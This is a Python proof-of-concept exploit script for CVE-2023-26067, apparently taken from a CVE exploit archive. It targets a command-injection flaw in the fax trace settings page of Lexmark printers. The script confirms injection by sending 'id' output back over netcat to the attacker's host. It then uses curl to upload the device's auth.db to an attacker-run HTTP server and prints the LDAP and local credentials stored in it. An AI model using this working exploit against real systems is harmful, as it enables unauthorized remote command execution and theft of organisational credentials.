4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-26067.py PY
#!/usr/bin/python3
import argparse
import json
import os
import queue
import requests
import socket
import time
import threading
import urllib3
urllib3.disable_warnings()

import http.server
import socketserver
import io
import cgi
import sqlite3


class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    """HTTP handler that stores a multipart ``file`` upload as ``./auth.db``.

    GET handling is inherited unchanged from ``SimpleHTTPRequestHandler``;
    only POST handling and logging are overridden.
    """

    def do_POST(self):
        """Save the uploaded file and reply with a plain-text status line.

        The response status is always 200; the body is ``Success`` or
        ``Failed`` depending on the result of :meth:`deal_post_data`.
        """
        r, info = self.deal_post_data()
        print(r, info, "by: ", self.client_address)
        body = b"Success\n" if r else b"Failed\n"
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        """Silence the default per-request logging.

        The signature mirrors the base class (``format, *args``) because the
        base class calls this hook with a varying number of arguments.
        """
        return None

    def deal_post_data(self):
        """Parse a ``multipart/form-data`` body and write field ``file`` to disk.

        Returns:
            A ``(ok, message)`` tuple. ``ok`` is False when the request is not
            a multipart form, has no ``file`` field, or the file cannot be
            written.
        """
        content_type = self.headers.get('Content-Type')
        if not content_type:
            return (False, "Missing Content-Type header")

        ctype, _params = cgi.parse_header(content_type)
        if ctype != 'multipart/form-data':
            return (False, "Expected a multipart/form-data upload")

        form = cgi.FieldStorage(fp=self.rfile, headers=self.headers,
                                environ={'REQUEST_METHOD': 'POST', 'CONTENT_TYPE': content_type, })
        try:
            uploads = form["file"]
        except KeyError:
            return (False, "No 'file' field in upload")

        # A repeated field name yields a list; normalise to a list either way.
        if not isinstance(uploads, list):
            uploads = [uploads]

        try:
            # Every record is written to the same path, so the last one wins.
            for record in uploads:
                with open("./auth.db", "wb") as out:
                    out.write(record.file.read())
        except IOError:
            return (False, "Can't create file to write, do you have permission to write?")
        return (True, "Files uploaded")


def start_file_server(fport):
    """Serve HTTP on all interfaces at port ``fport`` until the process exits.

    ``fport`` may be an int or a numeric string. Requests are handled by
    ``CustomHTTPRequestHandler``. This call blocks in ``serve_forever``.
    """
    # Set on the class before instantiation so the bind uses SO_REUSEADDR.
    socketserver.TCPServer.allow_reuse_address = True
    listen_address = ("", int(fport))
    httpd = socketserver.TCPServer(listen_address, CustomHTTPRequestHandler)
    with httpd:
        print(f'[*] Starting HTTP server on {fport}')
        httpd.serve_forever()

def check_page_exists(url):
    """Return True when ``{url}/cgi-bin/fax_change_faxtrace_settings`` answers 200.

    The GET is sent without TLS verification and with a 15 second timeout.
    Any other status code is printed and reported as False.
    """
    response = requests.get(f'{url}/cgi-bin/fax_change_faxtrace_settings', verify=False, timeout=15)
    if response.status_code != 200:
        print(f'[-] Vulnerable page returned status {response.status_code}')
        return False

    print('[*] Vulnerable page accessible!')
    return True


def send_payload(url, data):
    """POST ``data`` to ``url``, treating a request timeout as non-fatal.

    The request is sent without TLS verification and with a 30 second
    timeout. Other ``requests`` errors (for example a refused connection)
    still propagate to the caller.
    """
    print('[*] Sending payload to server...')
    # Payload request commonly is reported as a time out even when successful
    try:
        requests.post(url, verify=False, data=data, timeout=30)
    except requests.exceptions.Timeout:
        # Timeout is the common base of ConnectTimeout and ReadTimeout.
        pass

    print('[*] Sent payload')


def _format_cred(row):
    """Join the columns of one result row with ':'; NULL becomes an empty string."""
    return ':'.join('' if value is None else str(value) for value in row)


def _collect_creds(cur, query, found_msg, empty_msg, error_msg):
    """Run ``query`` on ``cur``, print the outcome and return the formatted rows.

    A failing query (for example a missing table or column) prints
    ``error_msg`` and yields an empty list instead of raising.
    """
    try:
        cur.execute(query)
        rows = cur.fetchall()
    except sqlite3.Error:
        print(error_msg)
        return []

    if not rows:
        print(empty_msg)
        return []

    print(found_msg)
    creds = []
    for row in rows:
        cred = _format_cred(row)
        creds.append(cred)
        print(cred)
    return creds


def dump_creds():
    """Read credential rows from ``auth.db`` in the current directory.

    Returns:
        A dict with keys ``'local'`` and ``'ldap'``, each a list of
        ``"column1:column2"`` strings. A list is empty when its table is
        missing, unreadable or has no rows.
    """
    creds = {'local': [], 'ldap': []}
    c = sqlite3.connect('auth.db')
    try:
        cur = c.cursor()
        creds['ldap'] = _collect_creds(
            cur,
            'SELECT machine_dn,machine_password FROM ldap',
            '[+] LDAP Credentials:',
            '[*] No LDAP credentials configured',
            '[*] No LDAP credentials configured',
        )
        creds['local'] = _collect_creds(
            cur,
            'SELECT username,password_or_pin FROM internal_account',
            '[+] Local Credentials:',
            '[*] No local credentials configured',
            '[*] No local credential configured',
        )
    finally:
        # Release the database handle even if a query raises unexpectedly.
        c.close()

    return creds


def catch_output(lport, output_q):
    """Accept one TCP connection on ``lport`` and queue the first data received.

    Exactly one item is always put on ``output_q``: the bytes from the first
    ``recv`` (up to 1024), or ``None`` when the accept or receive timed out
    or the peer closed the connection without sending anything.

    Args:
        lport: Port to listen on (int or numeric string), bound on 0.0.0.0.
        output_q: Queue that receives the result.
    """
    listener = None
    conn = None
    data = None
    try:
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.settimeout(15)
        listener.bind(('0.0.0.0', int(lport)))
        listener.listen(1)
        print(f'[*] Listening for blind output on 0.0.0.0:{lport}')

        conn, _addr = listener.accept()
        conn.settimeout(30)
        # recv() returns b'' once the peer has closed; looping on that would
        # spin forever, so a single read is done and "nothing" maps to None.
        data = conn.recv(1024) or None
    except socket.timeout:
        pass
    finally:
        if conn:
            conn.close()
        if listener:
            # Free the port so a later call can bind it again.
            listener.close()
        output_q.put(data)

def blind_execute(url, lhost, lport, cmd, get_response):
    """Send ``cmd`` inside the ``FT_Custom_lbtrace`` form value and optionally read its output.

    When ``get_response`` is true, a ``catch_output`` listener thread is
    started on ``lport`` and the command is wrapped so that its output is
    piped to ``lhost:lport``.

    Returns:
        The decoded, stripped output when ``get_response`` is true and data
        arrived; otherwise ``None``.
    """
    listener_thread = None
    output_q = None
    payload = cmd
    if get_response:
        payload = f'echo `{cmd}` | nc {lhost} {lport}'
        output_q = queue.Queue()
        listener_thread = threading.Thread(target=catch_output, args=(lport, output_q), daemon=True)
        listener_thread.start()

    # Send the blind command
    target = f'{url}/cgi-bin/fax_change_faxtrace_settings'
    send_payload(target, f'FT_Custom_lbtrace=$({payload})')

    if not get_response:
        return None

    # Give the listener up to 30s to finish, then up to 10s more for its result.
    listener_thread.join(30)
    try:
        res = output_q.get(timeout=10)
    except queue.Empty:
        return None
    return res.decode().strip() if res else None

def exec_and_dump(output, url, lhost, lport, fport):
    """Request an upload of the auth database, then merge its credentials into ``output``.

    Starts ``start_file_server`` on ``fport`` in a daemon thread, sends a
    curl upload command through ``blind_execute``, waits 15 seconds and then
    reads ``auth.db`` with ``dump_creds``.

    Returns:
        ``output``, updated in place with the ``'local'`` and ``'ldap'`` lists.

    Raises:
        ValueError: If ``auth.db`` does not exist after the wait.
    """
    print('[*] Attempting to dump auth database')
    # Start HTTP server to catch auth.db
    threading.Thread(target=start_file_server, args=(fport,), daemon=True).start()

    # Post it
    upload_cmd = f"curl -F 'file=@/var/fs/security/auth/auth.db' http://{lhost}:{fport}/"
    blind_execute(url, lhost, lport, upload_cmd, get_response=False)

    # Extract it
    print('[*] Waiting to pilfer database...')
    time.sleep(15)
    if os.path.exists('auth.db'):
        output.update(dump_creds())
        return output

    raise ValueError('Failed exfiltrating auth.db')

def wakeup(url):
    """Issue two sequential GET requests to ``url``, discarding the responses.

    Each request is sent without TLS verification and with a 15 second
    timeout; request errors propagate to the caller.
    """
    for attempt in (1, 2):
        print(f'[*] Sending wakeup {attempt}')
        requests.get(url, verify=False, timeout=15)

def exploit(url, lhost, lport, fport):
    """Run the check phase and then the dump phase, each with up to three attempts.

    Args:
        url: Base URL of the target.
        lhost: Address the target should connect back to.
        lport: Local port used to catch command output.
        fport: Local port used by the file-upload HTTP server.

    Returns:
        A dict with key ``'vulnerable'`` and, once a dump succeeded, the
        ``'local'`` and ``'ldap'`` credential lists.
    """
    output = {'vulnerable': False}

    # Lexmark web service seems to hang when getting in-op traffic at same time, sleep and retry
    for _ in range(3):
        try:
            wakeup(url)

            print('[*] Checking if vulnerable page is accessible')
            if not check_page_exists(url):
                output['vulnerable'] = False
                return output

            print('[*] Checking if vulnerable')
            id_output = blind_execute(url, lhost, lport, 'id', get_response=True)
            if id_output is None:
                # No output came back; treat it as transient and retry.
                raise ValueError('No command output received')
            if 'httpd' in id_output:
                print(f'[+] id output: {id_output}')
                output['vulnerable'] = True
                break

            print('[-] Not vulnerable!')
            output['vulnerable'] = False
            return output
        except Exception as exc:
            # Exception (not a bare except) so Ctrl-C still stops the script.
            print(f'[-] Attempt failed ({exc}), retrying in 30 seconds')
            time.sleep(30)

    for _ in range(3):
        try:
            output = exec_and_dump(output, url, lhost, lport, fport)
            if isinstance(output.get('local'), list):
                break
        except Exception as exc:
            print(f'[-] Attempt failed ({exc}), retrying in 30 seconds')
            time.sleep(30)

    # Returned after the loop: a return inside ``finally`` would end the
    # retry loop after its first iteration.
    return output


if __name__ == "__main__":
    # Command-line entry point: parse the options, run exploit() and store
    # its result dict as JSON in output.json.
    cli = argparse.ArgumentParser()
    cli.add_argument('-u', '--url', help='The URL of the target', required=True)
    cli.add_argument('-l', '--lhost', help='The IP address of the listening post', required=True)
    cli.add_argument('-p', '--lport', help='The local port to start the socket to catch command output', default=443)
    cli.add_argument('-f', '--fport', help='The local port to start the HTTP service for catching files',
                     default=8443)
    opts = cli.parse_args()

    result = exploit(opts.url, opts.lhost, opts.lport, opts.fport)
    with open('output.json', 'w') as out_file:
        json.dump(result, out_file)